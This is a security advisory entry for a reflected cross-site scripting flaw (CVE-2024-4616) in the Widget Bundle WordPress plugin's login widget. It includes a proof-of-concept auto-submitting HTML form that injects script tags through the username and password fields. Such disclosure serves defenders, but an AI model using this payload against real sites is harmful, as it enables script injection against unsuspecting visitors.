Lucene search
Bob MatyasWPEX-ID:D203BF3B-AEE9-4755-B429-D6BBDD940890HistoryMay 31, 2024 - 12:00 a.m.
Widget Bundle <= 2.0.0 - Unauthencated Reflected XSS
2024-05-3100:00:00
Bob Matyas
27
widget bundle
user login/registration
unauthenticated
reflected xss
vulnerability
security exploit
Description The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users
On a site with the User Login/Registration widget active, have an unauthenticated user send a post request to the any page where the widget appears:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com" method="post">
<input type="hidden" name="login_username" value='"><script>alert(1)</script>' />
<input type="hidden" name="login_password" value='"><script>alert(2)</script>' />
<input type="hidden" name="widget_login_submit" value="Login" />
<input type="submit" value="Submit" />
</form>
</body>
```Related
vulnrichment
vulnrichment
CVE-2024-4616 Widget Bundle <= 2.0.0 - Unauthencated Reflected XSS
2024-06-21 06:00:05
nvd
nvd
CVE-2024-4616
2024-06-21 06:15:12
cve
cve
CVE-2024-4616
2024-06-21 06:15:12
cvelist
cvelist
CVE-2024-4616 Widget Bundle <= 2.0.0 - Unauthencated Reflected XSS
2024-06-21 06:00:05
wpvulndb
wpvulndb
Widget Bundle <= 2.0.0 - Unauthencated Reflected XSS
2024-05-31 00:00:00
wordfence
wordfence
AI Score
6.2
Confidence
High
EPSS
0.001
Percentile
17.0%
Related for WPEX-ID:D203BF3B-AEE9-4755-B429-D6BBDD940890